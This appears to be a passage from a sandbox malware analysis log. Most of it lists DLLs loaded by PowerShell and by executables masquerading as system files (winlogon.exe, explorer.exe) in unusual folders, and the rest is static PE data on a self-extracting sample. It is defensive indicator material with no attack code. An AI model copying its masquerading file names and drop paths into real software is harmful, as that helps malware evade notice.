                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\ProgramData\SoftwareDistribution\winlogon.exeSection loaded: mscoree.dll
                                    Source: C:\ProgramData\SoftwareDistribution\winlogon.exeSection loaded: apphelp.dll
                                    Source: C:\ProgramData\SoftwareDistribution\winlogon.exeSection loaded: kernel.appcore.dll
                                    Source: C:\ProgramData\SoftwareDistribution\winlogon.exeSection loaded: version.dll
                                    Source: C:\ProgramData\SoftwareDistribution\winlogon.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\ProgramData\SoftwareDistribution\winlogon.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\ProgramData\SoftwareDistribution\winlogon.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\ProgramData\SoftwareDistribution\winlogon.exeSection loaded: uxtheme.dll
                                    Source: C:\ProgramData\SoftwareDistribution\winlogon.exeSection loaded: windows.storage.dll
                                    Source: C:\ProgramData\SoftwareDistribution\winlogon.exeSection loaded: wldp.dll
                                    Source: C:\ProgramData\SoftwareDistribution\winlogon.exeSection loaded: profapi.dll
                                    Source: C:\ProgramData\SoftwareDistribution\winlogon.exeSection loaded: cryptsp.dll
                                    Source: C:\ProgramData\SoftwareDistribution\winlogon.exeSection loaded: rsaenh.dll
                                    Source: C:\ProgramData\SoftwareDistribution\winlogon.exeSection loaded: cryptbase.dll
                                    Source: C:\ProgramData\SoftwareDistribution\winlogon.exeSection loaded: sspicli.dll
                                    Source: C:\ProgramData\SoftwareDistribution\winlogon.exeSection loaded: mscoree.dll
                                    Source: C:\ProgramData\SoftwareDistribution\winlogon.exeSection loaded: kernel.appcore.dll
                                    Source: C:\ProgramData\SoftwareDistribution\winlogon.exeSection loaded: version.dll
                                    Source: C:\ProgramData\SoftwareDistribution\winlogon.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\ProgramData\SoftwareDistribution\winlogon.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\ProgramData\SoftwareDistribution\winlogon.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\ProgramData\SoftwareDistribution\winlogon.exeSection loaded: uxtheme.dll
                                    Source: C:\ProgramData\SoftwareDistribution\winlogon.exeSection loaded: windows.storage.dll
                                    Source: C:\ProgramData\SoftwareDistribution\winlogon.exeSection loaded: wldp.dll
                                    Source: C:\ProgramData\SoftwareDistribution\winlogon.exeSection loaded: profapi.dll
                                    Source: C:\ProgramData\SoftwareDistribution\winlogon.exeSection loaded: cryptsp.dll
                                    Source: C:\ProgramData\SoftwareDistribution\winlogon.exeSection loaded: rsaenh.dll
                                    Source: C:\ProgramData\SoftwareDistribution\winlogon.exeSection loaded: cryptbase.dll
                                    Source: C:\ProgramData\SoftwareDistribution\winlogon.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeSection loaded: mscoree.dll
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeSection loaded: version.dll
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeSection loaded: uxtheme.dll
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeSection loaded: windows.storage.dll
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeSection loaded: wldp.dll
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeSection loaded: profapi.dll
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeSection loaded: cryptsp.dll
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeSection loaded: rsaenh.dll
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeSection loaded: cryptbase.dll
                                    Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeSection loaded: sspicli.dll
                                    Source: C:\Browserhost\intoHostperf.exeSection loaded: mscoree.dll
                                    Source: C:\Browserhost\intoHostperf.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Browserhost\intoHostperf.exeSection loaded: version.dll
                                    Source: C:\Browserhost\intoHostperf.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Browserhost\intoHostperf.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Browserhost\intoHostperf.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Browserhost\intoHostperf.exeSection loaded: uxtheme.dll
                                    Source: C:\Browserhost\intoHostperf.exeSection loaded: windows.storage.dll
                                    Source: C:\Browserhost\intoHostperf.exeSection loaded: wldp.dll
                                    Source: C:\Users\user\Desktop\DCobxod.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                                    Source: Window RecorderWindow detected: More than 3 window changes detected
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                                    Source: DCobxod.exeStatic file information: File size 36950717 > 1048576
                                    Source: DCobxod.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                    Source: DCobxod.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                    Source: DCobxod.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                    Source: DCobxod.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                    Source: DCobxod.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                    Source: DCobxod.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                    Source: DCobxod.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Source: DCobxod.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: DCobxod.exe
                                    Source: Binary string: 8C:\Users\user\AppData\Local\Temp\smysgui2\smysgui2.pdb source: intoHostperf.exe, 00000005.00000002.2251764512.000000000339E000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: 8C:\Users\user\AppData\Local\Temp\y4s1cmk0\y4s1cmk0.pdb source: intoHostperf.exe, 00000005.00000002.2251764512.000000000339E000.00000004.00000800.00020000.00000000.sdmp
                                    Source: DCobxod.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
